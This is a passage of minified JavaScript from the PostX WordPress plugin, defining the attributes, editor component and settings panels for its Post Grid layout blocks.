{{imgOpacity}}; }"}]},fallbackEnable:{type:"boolean",default:!0,style:[{depends:[{key:"showImage",condition:"==",value:!0}]}]},fallbackImg:{type:"object",default:"",style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"fallbackEnable",condition:"==",value:!0}]}]},imgSrcset:{type:"boolean",default:!1},imgLazy:{type:"boolean",default:!1},showSeoMeta:{type:"boolean",default:!1},showFullExcerpt:{type:"boolean",default:!1,style:[{depends:[{key:"showSeoMeta",condition:"==",value:!1}]}]},excerptLimit:{type:"string",default:10,style:[{depends:[{key:"showFullExcerpt",condition:"==",value:!1}]}]},excerptColor:{type:"string",default:"#fff",style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, {{ULTP}} .ultp-block-excerpt p { color:{{excerptColor}}; }"}]},excerptTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:20,unit:"px"},decoration:"none",family:""},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, {{ULTP}} .ultp-block-excerpt p"}]},excerptPadding:{type:"object",default:{lg:{top:5,bottom:"",unit:"px"}},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt { padding: {{excerptPadding}}; }"}]},contentAlign:{type:"string",default:"left",style:[{depends:[{key:"contentAlign",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta {justify-content: flex-start;}"},{depends:[{key:"contentAlign",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta {justify-content: center;}"},{depends:[{key:"contentAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta { justify-content: flex-end; } \n          .rtl {{ULTP}} .ultp-block-meta {justify-content: start;}"},{depends:[{key:"contentAlign",condition:"==",value:"right"},{key:"readMore",condition:"==",value:!0}],selector:" .rtl {{ULTP}} .ultp-block-readmore a {display:flex; flex-direction:row-reverse;justify-content: flex-end;}"}]},overlayContentPosition:{type:"string",default:"bottomPosition",style:[{depends:[{key:"overlayContentPosition",condition:"==",value:"topPosition"}],selector:"{{ULTP}} .ultp-block-content-topPosition { align-items:flex-start; }"},{depends:[{key:"overlayContentPosition",condition:"==",value:"middlePosition"}],selector:"{{ULTP}} .ultp-block-content-middlePosition { align-items:center; }"},{depends:[{key:"overlayContentPosition",condition:"==",value:"bottomPosition"}],selector:"{{ULTP}} .ultp-block-content-bottomPosition { align-items:flex-end; }"}]},overlayBgColor:{type:"object",default:{openColor:1,type:"color",color:""},style:[{selector:"{{ULTP}} .ultp-block-content-inner"}]},overlayWrapPadding:{type:"object",default:{lg:{top:"20",bottom:"20",left:"20",right:"20",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-inner { padding: {{overlayWrapPadding}}; }"}]},headingText:{type:"string",default:"Post Grid #2"},filterBelowTitle:{type:"boolean",default:!1,style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { position: relative; display: block; margin: auto 0 0 0; height: auto; }"}]},filterAlign:{type:"object",default:{lg:""},style:[{depends:[{key:"filterBelowTitle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { text-align:{{filterAlign}}; }"}]},filterType:{type:"string",default:"category"},filterText:{type:"string",default:"all"},filterValue:{type:"string",default:"[]",style:[{depends:[{key:"filterType",condition:"!=",value:""}]}]},fliterTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:22,unit:"px"},decoration:"none",family:"",weight:500},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a"}]},filterColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a { color:{{filterColor}}; }\n          {{ULTP}} .flexMenu-viewMore a:before { border-color:{{filterColor}}}"}]},filterHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a:hover, \n          {{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a.filter-active { color:{{filterHoverColor}} !important; } \n          {{ULTP}} .ultp-flex-menu .flexMenu-viewMore a:hover::before { border-color:{{filterHoverColor}}}"}]},filterBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { background:{{filterBgColor}}; }"}]},filterHoverBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover, \n          {{ULTP}} .ultp-filter-wrap ul li.filter-item > a.filter-active, \n          {{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore > a:hover { background:{{filterHoverBgColor}}; }"}]},filterBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a"}]},filterHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover"}]},filterRadius:{type:"object",default:{lg:{top:2,right:2,bottom:2,left:2,unit:"px"},unit:"px"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { border-radius:{{filterRadius}}; }"}]},fliterSpacing:{type:"object",default:{lg:{top:"",bottom:"",right:"",left:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li { margin:{{fliterSpacing}}; }"}]},fliterPadding:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a, \n          {{ULTP}} .ultp-filter-wrap .flexMenu-viewMore > a { padding:{{fliterPadding}}; }"}]},filterDropdownColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a { color:{{filterDropdownColor}}; }"}]},filterDropdownHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a:hover { color:{{filterDropdownHoverColor}}; }"}]},filterDropdownBg:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { background:{{filterDropdownBg}}; }"}]},filterDropdownRadius:{type:"object",default:{lg:{top:2,right:2,bottom:2,left:2,unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { border-radius:{{filterDropdownRadius}}; }"}]},filterDropdownPadding:{type:"object",default:{lg:{top:"15",bottom:"15",left:"20",right:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { padding:{{filterDropdownPadding}}; }"}]},filterMobile:{type:"boolean",default:!0},filterMobileText:{type:"string",default:"More",style:[{depends:[{key:"filterMobile",condition:"==",value:!0}]}]},paginationType:{type:"string",default:"pagination"},...(0,o.t)(["heading","advFilter","advanceAttr","pagination","video","meta","category","readMore","query"],["queryExcludeAuthor"],[{key:"queryNumber",default:"4"},{key:"pagiAlign",default:{lg:"left"}},{key:"metaList",default:'["metaAuthor","metaDate"]'},{key:"metaColor",default:"#F3F3F3"},{key:"metaSeparatorColor",default:"#b3b3b3"},{key:"readMoreColor",default:"#fff"}]),...(0,i.b)({defColor:"#fff"}),V4_1_0_CompCheck:a.O}},24484:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(67594),n=l(67163),r=l(75108),s=l(98453);const{__}=wp.i18n,{registerBlockType:p}=wp.blocks;(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/post-grid-2/","block_docs"),p(s,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/post-grid-2.svg"}),attributes:r.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/postgrid2.svg"}},transforms:{to:[...(0,i.Z)("ultimate-post/post-grid-2")]},edit:n.Z,save:()=>null})},38219:(e,t,l)=>{"use strict";l.d(t,{Z:()=>M});var o=l(67294),a=l(53049),i=l(23890),n=l(49491),r=l(53105),s=l(29236),p=l(53508),c=l(46896),u=l(71411),d=l(93985),m=l(8152),g=l(76005),y=l(99838),b=l(31760),v=l(73151),h=l(69735),f=l(2963),k=l(39349),w=l(87025),x=l(87402);const{__}=wp.i18n,{InspectorControls:T,useBlockProps:_}=wp.blockEditor,{useEffect:C,useRef:E,useState:S,Fragment:P}=wp.element,{Spinner:L,Placeholder:I}=wp.components,{getBlockAttributes:B,getBlockRootClientId:U}=wp.data.select("core/block-editor");function M(e){const t=E(null),{setAttributes:l,name:M,clientId:A,isSelected:H,attributes:N,className:j,context:Z,attributes:{blockId:O,currentPostId:R,previewImg:D,advanceId:z,paginationShow:F,paginationAjax:W,headingShow:V,filterShow:G,paginationType:q,navPosition:$,paginationNav:K,loadMoreText:J,paginationText:Y,dcFields:X,dcEnabled:Q,readMoreIcon:ee,excerptLimit:te,column:le,metaStyle:oe,metaShow:ae,catShow:ie,showImage:ne,metaSeparator:re,titleShow:se,catStyle:pe,catPosition:ce,titlePosition:ue,imgAnimation:de,imgOverlayType:me,imgOverlay:ge,metaList:ye,metaListSmall:be,showSmallCat:ve,showSmallMeta:he,readMore:fe,readMoreText:ke,overlayContentPosition:we,showSmallBtn:xe,showSmallExcerpt:Te,metaPosition:_e,showFullExcerpt:Ce,layout:Ee,titleAnimation:Se,customCatColor:Pe,onlyCatColor:Le,contentTag:Ie,titleTag:Be,showSeoMeta:Ue,titleLength:Me,metaMinText:Ae,metaAuthorPrefix:He,titleStyle:Ne,metaDateFormat:je,authorLink:Ze,excerptShow:Oe,fallbackEnable:Re,imgCropSmall:De,imgCrop:ze,vidIconEnable:Fe,notFoundMessage:We,V4_1_0_CompCheck:{runComp:Ve}}}=e,[Ge,qe]=S(w.Ti),[$e,Ke]=S(null);function Je(e){qe({...Ge,selectedDC:e})}function Ye(){qe({...Ge,selectedDC:"0,0,1",toolbarSettings:"dc_field"})}function Xe(e){qe({...Ge,section:{...w.ZQ,[e]:!0}}),(0,w.Rt)(e),(0,w.ob)(e),Ke("setting")}function Qe(e){qe((t=>({...t,toolbarSettings:e}))),(0,w.os)(e)}function et(){Ge.error&&qe({...Ge,error:!1}),Ge.loading||qe({...Ge,loading:!0}),wp.apiFetch({path:"/ultp/fetch_posts",method:"POST",data:(0,a.Ld)(N)}).then((e=>{qe({...Ge,postsList:e,loading:!1})})).catch((e=>{qe({...Ge,loading:!1,error:!0})}))}C((()=>{(0,w.oA)(),et()}),[]),C((()=>{const t=A.substr(0,6),o=B(U(A));(0,a.qi)(l,o,R,A),(0,v.h)(e),O?O&&O!=t&&(o?.hasOwnProperty("ref")||(0,a.k0)()||o?.hasOwnProperty("theme")||l({blockId:t})):(l({blockId:t}),ultp_data.archive&&"archive"==ultp_data.archive&&l({queryType:"archiveBuilder"}))}),[A]),C((()=>{const e=t.current;(0,h.o6)()&&0===N.dcFields.length&&l({dcFields:Array(x.PR).fill(void 0)}),e?((0,a.Qr)(e,N)&&(et(),t.current=N),e.isSelected!==H&&H&&(0,w.gT)(Xe,Qe)):t.current=N}),[N]);const tt={settingTab:$e,setSettingTab:Ke,setAttributes:l,name:M,attributes:N,setSection:Xe,section:Ge.section,clientId:A,context:Z,setSelectedDc:Je,selectedDC:Ge.selectedDC,selectParentMetaGroup:function(e){Je(e),Qe("dc_group")}};let lt;if(O&&(lt=(0,y.Kh)(N,"ultimate-post/post-grid-3",O,(0,a.k0)())),D&&!H)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:D});C((()=>{H&&N.previewImg&&l({previewImg:""})}),[e?.isSelected]);const ot=_({...z&&{id:z},className:`ultp-block-${O} ${j}`,onClick:e=>{e.stopPropagation(),Xe("general"),Qe("")}});return(0,o.createElement)(P,null,(0,o.createElement)(x.FP,{store:tt,selected:Ge.toolbarSettings}),(0,o.createElement)(T,null,(0,o.createElement)(x.ZP,{store:tt})),(0,o.createElement)(b.Z,{include:[{type:"query"},{type:"template"},{type:"grid_align",key:"contentAlign"},{type:"grid_spacing",exclude:["columns","wrapOuterPadding","wrapMargin","spaceSep"]},{type:"layout",block:"post-grid-3",key:"layout",options:[{img:"assets/img/layouts/pg3/l1.png",label:__("Layout 1","ultimate-post"),value:"layout1",pro:!1},{img:"assets/img/layouts/pg3/l2.png",label:__("Layout 2","ultimate-post"),value:"layout2",pro:!0},{img:"assets/img/layouts/pg3/l3.png",label:__("Layout 3","ultimate-post"),value:"layout3",pro:!0},{img:"assets/img/layouts/pg3/l4.png",label:__("Layout 4","ultimate-post"),value:"layout4",pro:!0},{img:"assets/img/layouts/pg3/l5.png",label:__("Layout 5","ultimate-post"),value:"layout5",pro:!0}]},{type:"feat_toggle",label:__("Grid Features","ultimate-post"),new:a.KE,[Ve?"exclude":"dep"]:a.N2}],store:tt}),(0,o.createElement)("div",ot,lt&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:lt}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},(V||G||F)&&(0,o.createElement)(r.Z,{attributes:N,setAttributes:l,onClick:()=>{Xe("heading"),Qe("heading")},setSection:Xe,setToolbarSettings:Qe}),function(){const t=`${Ie}`,a=(e,t)=>(0,h.o6)()&&Q&&(0,o.createElement)(k.Z,{idx:e,postId:t,fields:X,settingsOnClick:(e,t)=>{e?.stopPropagation(),Qe(t)},selectedDC:Ge.selectedDC,setSelectedDc:Je,setAttributes:l,dcFields:X});return Ge.error?(0,o.createElement)(I,{label:__("Posts are not available.","ultimate-post")},(0,o.createElement)("div",{style:{marginBottom:15}},__("Make sure Add Post.","ultimate-post"))):Ge.loading?(0,o.createElement)(I,{className:"ultp-backend-block-loading",label:__("Loading…","ultimate-post")},(0,o.createElement)(L,null)):Ge.postsList.length>0?(0,o.createElement)("div",{className:`ultp-block-items-wrap ultp-block-row ultp-${Ee} ultp-block-column${le}`},Ge.postsList.map(((l,r)=>{const p=0==r?JSON.parse(ye.replaceAll("u0022",'"')):JSON.parse(be.replaceAll("u0022",'"'));return(0,o.createElement)(t,{key:r,className:`ultp-block-item post-id-${l.ID} ${Se?"ultp-animation-"+Se:""}`},(0,o.createElement)("div",{className:"ultp-block-content-wrap ultp-block-content-overlay"},(0,o.createElement)(s.zk,{imgOverlay:ge,imgOverlayType:me,imgAnimation:de,post:l,fallbackEnable:Re,vidIconEnable:Fe,catPosition:ce,imgCropSmall:De,showImage:ne,imgCrop:ze,idx:r,showSmallCat:ve,Category:0!=r&&!ve||"aboveTitle"==ce?null:(0,o.createElement)("div",{className:"ultp-category-img-grid"},(0,o.createElement)(i.Z,{post:l,catShow:ie,catStyle:pe,catPosition:ce,customCatColor:Pe,onlyCatColor:Le,onClick:e=>{Xe("taxonomy-/-category"),Qe("cat")}})),onClick:()=>{Xe("image"),Qe("image")}}),Fe&&l.has_video&&(0,o.createElement)(s.nk,{onClick:()=>{Xe("video"),Qe("video")}}),(0,o.createElement)("div",{className:`ultp-block-content ultp-block-content-${we}`},(0,o.createElement)("div",{className:"ultp-block-content-inner"},a(7,l.ID),"aboveTitle"==ce&&(0==r||ve)&&(0,o.createElement)(i.Z,{post:l,catShow:ie,catStyle:pe,catPosition:ce,customCatColor:Pe,onlyCatColor:Le,onClick:e=>{Xe("taxonomy-/-category"),Qe("cat")}}),a(6,l.ID),l.title&&se&&1==ue&&(0,o.createElement)(g.Z,{title:l.title,headingTag:Be,titleLength:Me,titleStyle:Ne,onClick:e=>{Xe("title"),Qe("title")}}),a(5,l.ID),(0==r||he)&&ae&&"top"==_e&&(0,o.createElement)(c.Z,{meta:p,post:l,metaSeparator:re,metaStyle:oe,metaMinText:Ae,metaAuthorPrefix:He,metaDateFormat:je,authorLink:Ze,onClick:e=>{Xe("meta"),Qe("meta")}}),a(4,l.ID),l.title&&se&&0==ue&&(0,o.createElement)(m.Z,{readMoreText:ke,readMoreIcon:ee,titleLabel:l.title,onClick:()=>{Xe("read-more"),Qe("read-more")}}),a(3,l.ID),(0==r||Te)&&Oe&&(0,o.createElement)(n.Z,{excerpt:l.excerpt,excerpt_full:l.excerpt_full,seo_meta:l.seo_meta,excerptLimit:te,showFullExcerpt:Ce,showSeoMeta:Ue,onClick:e=>{Xe("excerpt"),Qe("excerpt")}}),a(2,l.ID),(0==r||xe)&&fe&&(0,o.createElement)(m.Z,{readMoreText:ke,readMoreIcon:ee,titleLabel:l.title,onClick:()=>{Xe("read-more"),Qe("read-more")}}),a(1,l.ID),(0==r||he)&&ae&&"bottom"==_e&&(0,o.createElement)(c.Z,{meta:p,post:l,metaSeparator:re,metaStyle:oe,metaMinText:Ae,metaAuthorPrefix:He,metaDateFormat:je,authorLink:Ze,onClick:e=>{Xe("meta"),Qe("meta")}}),a(0,l.ID),(0,h.o6)()&&Q&&(0,o.createElement)(f.Z,{dcFields:X,setAttributes:e.setAttributes,startOnboarding:Ye,overlayMode:!0,inverseColor:!0})))))}))):(0,o.createElement)(I,{className:"ultp-backend-block-loading",label:We})}(),F&&"loadMore"==q&&(0,o.createElement)(p.Z,{loadMoreText:J,onClick:e=>{Xe("pagination"),Qe("pagination")}}),F&&"navigation"==q&&"topRight"!=$&&(0,o.createElement)(u.Z,{onClick:()=>{Xe("pagination"),Qe("pagination")}}),F&&"pagination"==q&&(0,o.createElement)(d.Z,{paginationNav:K,paginationAjax:W,paginationText:Y,onClick:e=>{Xe("pagination"),Qe("pagination")}}))))}},87402:(e,t,l)=>{"use strict";l.d(t,{FP:()=>v,PR:()=>y,ZP:()=>b});var o=l(67294),a=l(53049),i=l(38156),n=l(13448),r=l(32258),s=l(87282),p=l(92637),c=l(43581),u=l(69735),d=l(82473),m=l(87025);const{__}=wp.i18n,{useEffect:g}=wp.element,y=8,b=e=>{const{store:t}=e,{queryType:l,advFilterEnable:n,advPaginationEnable:r,V4_1_0_CompCheck:{runComp:u}}=t.attributes,{context:d,section:y,settingTab:b,setSettingTab:v}=t;return g((()=>{(0,m.CH)(d,n,t,r)}),[n,r,t.clientId]),(0,o.createElement)(o.Fragment,null,(0,o.createElement)(c.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid6831",store:t}),(0,o.createElement)(p.Sections,{settingTab:b,setSettingTab:v},(0,o.createElement)(p.Section,{slug:"sorting",title:__("Post Sorting","ultimate-post")},(0,o.createElement)(a.lA,{title:"inline",initialOpen:!0,store:t}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("Include","ultimate-post"),include:s.fL}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("Exclude","ultimate-post"),include:s.M6}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("inline","ultimate-post"),include:[{position:1,data:{type:"select",key:"queryUnique",label:__("Unique Content Group (Frontend Only)","ultimate-post"),pro:!0,options:[{value:"",label:__("Disable","ultimate-post")},{value:"group1",label:__("Content Group 1","ultimate-post")},{value:"group2",label:__("Content Group 2","ultimate-post")},{value:"group3",label:__("Content Group 3","ultimate-post")},{value:"group4",label:__("Content Group 4","ultimate-post")},{value:"group5",label:__("Content Group 5","ultimate-post")}],help:__("Unique Content Group solves the repetition of posts on multiple blocks.[Frontend Only]","ultimate-post")}}]})),(0,o.createElement)(p.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.cA,{store:t,initialOpen:y.general,dynamicHelpText:{select:{key:"queryQuick",popular_post_1_day_view:"- Most viewed posts published in the last 24 hours",popular_post_7_days_view:"- Most viewed posts published in the last 7 days",popular_post_30_days_view:"- Most viewed posts published in the last 30 days",popular_post_all_times_view:"- Most viewed posts of all time"}},include:[{position:0,data:{type:"layout",block:"post-grid-3",key:"layout",label:__("Layout","ultimate-post"),options:[{img:"assets/img/layouts/pg3/l1.png",label:__("Layout 1","ultimate-post"),value:"layout1",pro:!1},{img:"assets/img/layouts/pg3/l2.png",label:__("Layout 2","ultimate-post"),value:"layout2",pro:!0},{img:"assets/img/layouts/pg3/l3.png",label:__("Layout 3","ultimate-post"),value:"layout3",pro:!0},{img:"assets/img/layouts/pg3/l4.png",label:__("Layout 4","ultimate-post"),value:"layout4",pro:!0},{img:"assets/img/layouts/pg3/l5.png",label:__("Layout 5","ultimate-post"),value:"layout5",pro:!0}]}},{position:4,data:{type:"range",key:"column",label:__("Columns","ultimate-post"),min:1,max:3,step:1}},{position:5,data:{type:"range",key:"overlayHeight",min:0,max:1e3,step:1,unit:!0,responsive:!0,label:__("Height","ultimate-post")}}],exclude:["columns"]}),(0,o.createElement)(a.VH,{isTab:!0,store:t,depend:"titleShow",initialOpen:y.title,include:[{position:5,data:{type:"typography",key:"titleLgTypo",label:__("Typography Large Title","ultimate-post")}}],hrIdx:[4,10]}),(0,o.createElement)(a.Hn,{isTab:!0,store:t,initialOpen:y.image,include:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}],exclude:["imgMargin","imageScale","imgWidth","imgHeight"],hrIdx:[{tab:"settings",hr:[3,11]},{tab:"style",hr:[4]}]}),(0,o.createElement)(a.Yk,{isTab:!0,store:t,depend:"metaShow",initialOpen:y.meta,include:[{position:0,data:{type:"toggle",key:"showSmallMeta",label:__("Small Item Meta","ultimate-post")}}],hrIdx:[{tab:"settings",hr:[4]},{tab:"style",hr:[7]}]}),(0,o.createElement)(a.Bq,{isTab:!0,initialOpen:y["taxonomy-/-category"],depend:"catShow",store:t,include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallCat",label:__("Small Item Category","ultimate-post")}}],hrIdx:[{tab:"style",hr:[8]}]}),(0,o.createElement)(a.X_,{isTab:!0,depend:"excerptShow",initialOpen:y.excerpt,store:t,include:[{position:0,data:{type:"toggle",key:"showSmallExcerpt",label:__("Small Item Excerpt","ultimate-post")}}]}),(0,o.createElement)(a.oY,{isTab:!0,store:t,initialOpen:y["read-more"],depend:"readMore",include:[{position:0,data:{type:"toggle",tab:"settings",key:"showSmallBtn",label:__("Small Item Read More","ultimate-post")}}]}),(0,o.createElement)(a.rS,{initialOpen:y.video,depend:"vidIconEnable",store:t}),(0,o.createElement)(a.fm,{store:t,include:a.aG}),!u&&(0,o.createElement)(i.Z,{open:y.filter||y.pagination||y.heading},(0,o.createElement)(a.Wh,{isTab:!0,initialOpen:y.heading,depend:"headingShow",store:t}),"posts"!=l&&"customPosts"!=l&&(0,o.createElement)(a.B0,{isTab:!0,store:t,initialOpen:y.filter,depend:"filterShow",hrIdx:[{tab:"settings",hr:[5]},{tab:"style",hr:[4,9]}]}),(0,o.createElement)(a.ng,{isTab:!0,store:t,initialOpen:y.pagination,depend:"paginationShow",hrIdx:[{tab:"style",hr:[4]}]}))),(0,o.createElement)(p.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:t,include:[{position:2,data:{type:"color",key:"loadingColor",label:__("Loading Color","ultimate-post"),pro:!0}}]}),(0,o.createElement)(a.Mg,{store:t}),(0,o.createElement)(a.iv,{store:t}))),(0,a.dH)())};function v({selected:e,store:t}){const{V4_1_0_CompCheck:{runComp:l}}=t.attributes,{metaShow:i,titleShow:s,catPosition:p,titlePosition:c,excerptShow:m,readMore:g,metaPosition:y,catShow:b}=t.attributes,v=[i&&"bottom"==y,g,m,s&&0==c,i&&"top"==y,s&&1==c,b&&"aboveTitle"==p];if((0,u.o6)()&&e.startsWith("dc_"))return(0,o.createElement)(d.Z,{store:t,selected:e,layoutContext:v});switch(e){case"filter":return l?null:(0,o.createElement)(r.Z,{text:"Filter"},(0,o.createElement)(a.sT,{store:t,attrKey:"fliterTypo",label:__("Filter Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.Eo)({include:["fliterSpacing","fliterPadding"],exclude:"__all",title:__("Filter Spacing","ultimate-post")}),store:t,label:__("Filter Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Filter Settings","ultimate-post"),styleTitle:__("Filter Style","ultimate-post"),settingsKeys:a.Df,styleKeys:a.YF,oArgs:a.rx,exStyle:["fliterTypo","fliterSpacing","fliterPadding"]}));case"heading":return l?null:(0,o.createElement)(r.Z,{text:"Heading"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Heading Settings","ultimate-post"),styleTitle:__("Heading Style","ultimate-post"),settingsKeys:a.cM,styleKeys:a.J5,oArgs:a.ii}));case"pagination":return l?null:(0,o.createElement)(r.Z,{text:"Pagination"},(0,o.createElement)(a.sT,{store:t,attrKey:"pagiTypo",label:__("Pagination Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.DU)({include:["pagiMargin","pagiPadding"],exclude:"__all",title:__("Pagination Spacing","ultimate-post")}),store:t,label:__("Pagination Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Pagination Settings","ultimate-post"),styleTitle:__("Pagination Style","ultimate-post"),settingsKeys:a.V2,styleKeys:a.xd,oArgs:a.YZ,exStyle:["pagiTypo","pagiMargin","pagiPadding"]}));case"video":return(0,o.createElement)(r.Z,{text:"Video"},(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.q7)({include:["popupIconColor","popupHovColor","popupTitleColor","closeIconColor","closeHovColor"],exclude:"__all",title:__("Video Icon Color","ultimate-post")}),store:t,label:__("Video Icon Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.q7)({exclude:["popupIconColor","popupHovColor","popupTitleColor","closeIconColor","closeHovColor"]}),store:t,label:__("Video Settings","ultimate-post")}));case"title":return(0,o.createElement)(r.Z,{text:"Title"},(0,o.createElement)(n.Z,{buttonContent:a.tj,include:(0,a.Wf)({include:["titleTypo",{data:{type:"typography",key:"titleLgTypo",label:__("Typography Large Title","ultimate-post")}}],exclude:"__all",title:__("Title Typography","ultimate-post")}),store:t,label:__("Title Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.Wf)({include:["titleColor","titleHoverColor","titleBackground"],exclude:"__all",title:__("Title Color","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.Wf)({exclude:["titleBackground","titleTypo","titleColor","titleHoverColor","titleLgTypo"],title:__("Title Settings","ultimate-post")}),store:t,label:__("Title Settings","ultimate-post")}));case"excerpt":return(0,o.createElement)(r.Z,{text:"Excerpt"},(0,o.createElement)(a.sT,{store:t,attrKey:"excerptTypo",label:__("Excerpt Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.BO)({include:["excerptColor"],exclude:"__all",title:__("Excerpt Color","ultimate-post")}),store:t,label:__("Excerpt Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.BO)({exclude:["excerptTypo","excerptColor"],include:[{position:0,data:{type:"toggle",key:"showSmallExcerpt",label:__("Small Item Excerpt","ultimate-post")}}],title:__("Excerpt Settings","ultimate-post")}),store:t,label:__("Excerpt Settings","ultimate-post")}));case"meta":return(0,o.createElement)(r.Z,{text:"Meta"},(0,o.createElement)(a.sT,{store:t,attrKey:"metaTypo",label:__("Meta Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.cr)({include:["metaSpacing","metaMargin","metaPadding"],exclude:"__all",title:__("Meta Spacing","ultimate-post")}),store:t,label:__("Meta Spacing","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.Cz,include:(0,a.cr)({include:a._y,exclude:"__all",title:__("Meta Texts","ultimate-post")}),store:t,label:__("Meta Texts","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Meta Settings","ultimate-post"),styleTitle:__("Meta Style","ultimate-post"),settingsKeys:a.G7,styleKeys:a.hd,oArgs:a.jK,incSettings:[{position:0,data:{type:"toggle",key:"showSmallMeta",label:__("Small Item Meta","ultimate-post")}}],exSettings:["metaListSmall"],exStyle:["metaTypo","metaMargin","metaPadding","metaSpacing"]}));case"read-more":return(0,o.createElement)(r.Z,{text:"Read More"},(0,o.createElement)(a.sT,{store:t,attrKey:"readMoreTypo",label:__("Read More Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.NJ)({include:["readMoreSacing","readMorePadding"],exclude:"__all",title:__("Read More Spacing","ultimate-post")}),store:t,label:__("Read More 